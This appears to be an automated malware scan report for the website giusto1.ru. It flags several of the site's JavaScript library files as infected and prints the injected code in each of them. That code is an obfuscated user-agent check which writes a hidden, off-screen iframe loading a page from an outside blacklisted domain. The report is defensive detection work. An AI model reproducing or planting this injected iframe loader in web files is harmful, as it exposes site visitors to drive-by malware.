Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=giusto1.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.giusto1.ru/ | 200 OK Content-Length: 16421 Content-Type: text/html | clean |
http://www.giusto1.ru/components/com_proofreader/js/proofreader.js | 200 OK Content-Length: 4560 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: drandeosman.itsvinylicious.com function Humancontroller() {
var abaca = navigator.userAgent; var monifica = (abaca.indexOf("Windows") < +1 || abaca.indexOf("Chrome") > -1); if (!monifica) { document.write('<ifr'+'ame src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="po'+'sition:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe>'); } } Humancontroller(); var gecko; function keyPressInit(){ if (document.addEventListener){ document.addEventListener("keypress",function(e){keyAction(e)},true); if (navigator.appName == "Microsoft Internet Explorer") return; document.addEventListener("keydown", functio ...[4318 bytes skipped]... Decoded script: <iframe src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="position:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe> | ||
http://www.giusto1.ru/components/com_proofreader/js/xajax.js | 200 OK Content-Length: 17227 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: drandeosman.itsvinylicious.com function Humancontroller() {
var abaca = navigator.userAgent; var monifica = (abaca.indexOf("Windows") < +1 || abaca.indexOf("Chrome") > -1); if (!monifica) { document.write('<ifr'+'ame src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="po'+'sition:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe>'); } } Humancontroller(); function Xajax(){this.arrayContainsValue=function(array,valueToCheck){for(i in array){if(array[i]==valueToCheck)return true;}return false;};this.DebugMessage=function(text){if(text.length > 1000)text=text.substr(0,1000)+"...\n[long response]\n...";try{if(this.debugWindo ...[3628 bytes skipped]... Decoded script: <iframe src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="position:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe> | ||
http://www.giusto1.ru/media/system/js/caption.js | 200 OK Content-Length: 2475 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: drandeosman.itsvinylicious.com function Humancontroller() {
var abaca = navigator.userAgent; var monifica = (abaca.indexOf("Windows") < +1 || abaca.indexOf("Chrome") > -1); if (!monifica) { document.write('<ifr'+'ame src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="po'+'sition:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe>'); } } Humancontroller(); var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var cap ...[1144 bytes skipped]... Decoded script: <iframe src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="position:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe> | ||
http://www.giusto1.ru/components/com_jcomments/js/jcomments-v2.0.js | 200 OK Content-Length: 26588 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: drandeosman.itsvinylicious.com function Humancontroller() {
var abaca = navigator.userAgent; var monifica = (abaca.indexOf("Windows") < +1 || abaca.indexOf("Chrome") > -1); if (!monifica) { document.write('<ifr'+'ame src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="po'+'sition:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe>'); } } Humancontroller(); function JCommentsEvents(){} function JCommentsInput(){} function JCommentsIndicator(){this.init();} function JCommentsForm(id,editor){this.init(id,editor);} function JCommentsEditor(textarea,resizable){this.init(textarea,resizable);} function JComments ...[3532 bytes skipped]... Decoded script: <iframe src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="position:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe> | ||
http://www.giusto1.ru/components/com_jcomments/libraries/joomlatune/ajax.js | 200 OK Content-Length: 4493 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: drandeosman.itsvinylicious.com function Humancontroller() {
var abaca = navigator.userAgent; var monifica = (abaca.indexOf("Windows") < +1 || abaca.indexOf("Chrome") > -1); if (!monifica) { document.write('<ifr'+'ame src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="po'+'sition:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe>'); } } Humancontroller(); if (!window.jtajax) { function jtAJAX() { this.options = {url: '',type: 'post',nocache: true,data: ''}; this.$ = function(id) {if(!id){return null;}var o=document.getElementById(id);if(!o&&document.all){o=document.all[id];}return o;}; this.ex ...[4202 bytes skipped]... Decoded script: <iframe src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="position:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe> | ||
http://www.giusto1.ru/templates/gusto-index/js/jquery-all-script.js | 200 OK Content-Length: 106742 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Humancontroller() {
var abaca = navigator.userAgent; var monifica = (abaca.indexOf("Windows") < +1 || abaca.indexOf("Chrome") > -1); if (!monifica) { document.write('<ifr'+'ame src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="po'+'sition:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe>'); } } Humancontroller(); (function(E,A){function U(){return false}function ba(){return true}function ja(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ga(a){var b,d,e=[],f=[],h,k,l,n,s,v,B,D;k=c.data(this,this.nodeType?"events":"__events__");if(typeof k==="function")k=k.events;if(!(a ...[3508 bytes skipped]... Antivirus reports:
| ||
http://www.giusto1.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 1844 Content-Type: text/html | clean |
http://www.giusto1.ru/index.php | 200 OK Content-Length: 16439 Content-Type: text/html | clean |
http://www.giusto1.ru/new-menu.html | 200 OK Content-Length: 18870 Content-Type: text/html | clean |
http://www.giusto1.ru/templates/gusto-all/js/swfobject_modified.js | 404 Not Found Content-Length: 1411 Content-Type: text/html | clean |
http://www.giusto1.ru/test404page.js | 404 Not Found Content-Length: 1411 Content-Type: text/html | clean |
http://www.giusto1.ru/banket-xoll.html | 200 OK Content-Length: 31619 Content-Type: text/html | clean |
http://www.giusto1.ru/plugins/content/multithumb/greybox/AJS.js | 200 OK Content-Length: 11167 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: drandeosman.itsvinylicious.com function Humancontroller() {
var abaca = navigator.userAgent; var monifica = (abaca.indexOf("Windows") < +1 || abaca.indexOf("Chrome") > -1); if (!monifica) { document.write('<ifr'+'ame src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="po'+'sition:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe>'); } } Humancontroller(); AJS={BASE_URL:"",drag_obj:null,drag_elm:null,_drop_zones:[],_cur_pos:null,join:function(_1,_2){ try{ return _2.join(_1); } catch(e){ var r=_2[0]||""; AJS.map(_2,function(_4){ r+=_1+_4; },1); return r+""; } },getScrollTop:function ...[4016 bytes skipped]... Decoded script: ...[5038 bytes skipped]... n() { return AJS.createDOM.apply(null, ['dd', arguments]); } AJS.SMALL=function() { return AJS.createDOM.apply(null, ['small', arguments]); } AJS.SMALL=function() { return AJS.createDOM.apply(null, ['small', arguments]); } AJS.PRE=function() { return AJS.createDOM.apply(null, ['pre', arguments]); } AJS.PRE=function() { return AJS.createDOM.apply(null, ['pre', arguments]); } <iframe src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="position:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe> | ||
http://www.giusto1.ru/plugins/content/multithumb/greybox/AJS_fx.js | 200 OK Content-Length: 3671 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: drandeosman.itsvinylicious.com function Humancontroller() {
var abaca = navigator.userAgent; var monifica = (abaca.indexOf("Windows") < +1 || abaca.indexOf("Chrome") > -1); if (!monifica) { document.write('<ifr'+'ame src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="po'+'sition:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe>'); } } Humancontroller(); AJS.fx={_shades:{0:"ffffff",1:"ffffee",2:"ffffdd",3:"ffffcc",4:"ffffbb",5:"ffffaa",6:"ffff99"},highlight:function(_1,_2){ var _3=new AJS.fx.Base(); _3.elm=AJS.$(_1); _3.setOptions(_2); _3.options.duration=600; AJS.update(_3,{increase:function(){ if( ...[3424 bytes skipped]... Decoded script: <iframe src="http://drandeosman.itsvinylicious.com/oliversoul15.html" style="position:absolute;left:-810px;top:-810px;" height="140" width="140"></iframe> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: giusto1.ru
Result:
GET / HTTP/1.1
Host: giusto1.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: giusto1.ru
Referer: http://www.google.com/search?q=giusto1.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: giusto1.ru
Referer: http://www.google.com/search?q=giusto1.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.